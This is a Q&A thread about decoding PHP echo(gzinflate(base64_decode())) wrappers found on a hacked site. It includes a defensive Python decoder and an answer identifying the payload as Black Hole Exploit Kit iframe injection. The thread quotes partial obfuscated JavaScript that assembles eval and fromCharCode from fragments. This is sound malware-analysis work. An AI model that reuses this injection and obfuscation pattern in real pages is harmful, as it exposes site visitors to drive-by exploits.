
I found several occurrences of echo(gzinflate(base64_decode(".....") in various .php files and I am curious what it exactly does. I think I managed to decode the text in quotes using base64 -d < fileetje.b64 > fileetje.gz where fileetje.b64 contains the string data. But when I subsequently try to gunzip the fileetje.gz, it reports bad data. Also when doing a file fileetje.gz it says data, where I would expect GZIP'ed data or something similar.

How can I decrypt the data from the Linux command line?

An online decoder like http://www.base64online.com/ can't make sense of the code either. Is it safe to add the string data to the question too?

UPDATE: I improvised a php script as it is only a simple echo (Thnx: glglgl). This is what came out:

<script>d=Date;d=new d();h=-parseInt('012')/5;if(window.document)try{new document.getElementById("qwe").prototype}catch(qqq){st=String;zz='al';zz='v'+zz;ss="";if(1){f='f'+'r'+'o'+'m'+'Ch'+'ar';f=f+'C'+'od'+'e';}e=this[f.substr(11)+zz];t='y';}n="3.5~3.5~51.5~50~15~19~49~54.5~48...............

And it ends in:

...........9~50~19.5~28.5~5.5~3.5~3.5~61.5".split("a~".substr(1));for(i=0;i!=563;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);</script>

  • hmmm... as it is just an echo command, it should be ok to execute just these lines. – glglgl Jun 02 '12 at 14:00
  • So if the encoded data is malicious javascript, that would be ok? I think not. – Jeremy Harris Jun 02 '12 at 14:02
  • It is not a gzip archive, but a gzip-compressed string. Try to download the content to your home webserver and test it. You can also post the full stuff here and let someone test it at home if you fear. – Whisperity Jun 02 '12 at 14:05
  • 1
    Can I uncompress such a string from the Linux command line? I managed using php, but I feel more comfortable with Linux commandline tools. – jippie Jun 02 '12 at 14:10
  • possible duplicate of [How to decode – mario Jun 02 '12 at 14:17
  • There's always php-cli: it might make some people recoil in horror as a general-purpose scripting tool, but for evaluating PHP expressions, it rules! You can call it with inline scripts just like perl or sed, or on small files. – Nicholas Wilson Jun 02 '12 at 15:13
  • @mario: Duplicate or not, my initial question was about how to decode the string using Linux command line tools. I didn't realize it was safe to run it from interactive php. I wasn't able to figure that out from any of the other questions I visited. – jippie Jun 02 '12 at 15:20
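Decoding the wrapper from the question on a Linux command line, as an added example that is not part of the original post or its answers: PHP's gzinflate() consumes a raw DEFLATE stream with no gzip header, which is why gunzip reports bad data and file says only "data". The script below only prints the decoded payload and never evaluates it; the sample PHP snippet it builds for itself is constructed, and the file path on the command line is whatever you pass in.

```python
"""Decode echo(gzinflate(base64_decode("..."))) payloads WITHOUT running them.

PHP's gzinflate() expects a raw DEFLATE stream (RFC 1951): no gzip header,
no zlib header, no checksum. gunzip therefore rejects it; zlib.decompress
with wbits=-15 handles exactly that framing.
"""
import base64
import re
import sys
import zlib

# Captures the base64 string literal inside gzinflate(base64_decode("...")).
PATTERN = re.compile(
    r'gzinflate\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)'
)


def inflate_payload(b64: str) -> str:
    """base64-decode, then raw-inflate; fall back to zlib/gzip framing."""
    raw = base64.b64decode("".join(b64.split()))
    for wbits in (-15, 47):  # -15 = raw DEFLATE (gzinflate); 47 = zlib or gzip
        try:
            return zlib.decompress(raw, wbits).decode("utf-8", errors="replace")
        except zlib.error:
            continue
    raise ValueError("not a DEFLATE, zlib or gzip stream")


def extract_payloads(php_source: str) -> list:
    """Decoded payload for every gzinflate(base64_decode(...)) call found."""
    return [inflate_payload(m.group(1)) for m in PATTERN.finditer(php_source)]


def make_sample(text: str) -> str:
    """Constructed helper: encode text the way PHP's gzdeflate() would."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(comp.compress(text.encode()) + comp.flush()).decode()


# Constructed sample file content; the payload is a harmless HTML comment.
SAMPLE_PHP = '<?php echo(gzinflate(base64_decode("%s"))); ?>' % make_sample(
    "<!-- decoded marker -->"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        src = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:
        src = SAMPLE_PHP
    for payload in extract_payloads(src):
        print(payload)  # inspect the output; do not feed it to a browser or php
```

Run it as `python3 decode_gzinflate.py infected.php` to print the hidden content of each wrapper in that file.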

1 Answer

The embedded JavaScript follows the format for the Black Hole Exploit kit. It injects an iFrame leading you to an exploit and can be bad news. Thinking that echo() (as stated above in a comment) is going to be safe is not true. That function just puts the embedded malware code into your page to do its damage.

Related SO Post: My wordpress site was hacked, anyone tell what this code does?

SO Post on How It Works: What is the purpose of this JavaScript hack?

Related Info:

http://johnbatchelorshow.com/jb/2012/01/lessons-learned-from-the-hacking-black-hole-exploit-kit/

http://nakedsecurity.sophos.com/2012/03/29/exploring-the-blackhole-exploit-kit/

  • `echo` is perfectly safe when being used from the command line. I agree that it is unsafe when calling it from a web browser. – jippie Jun 02 '12 at 15:22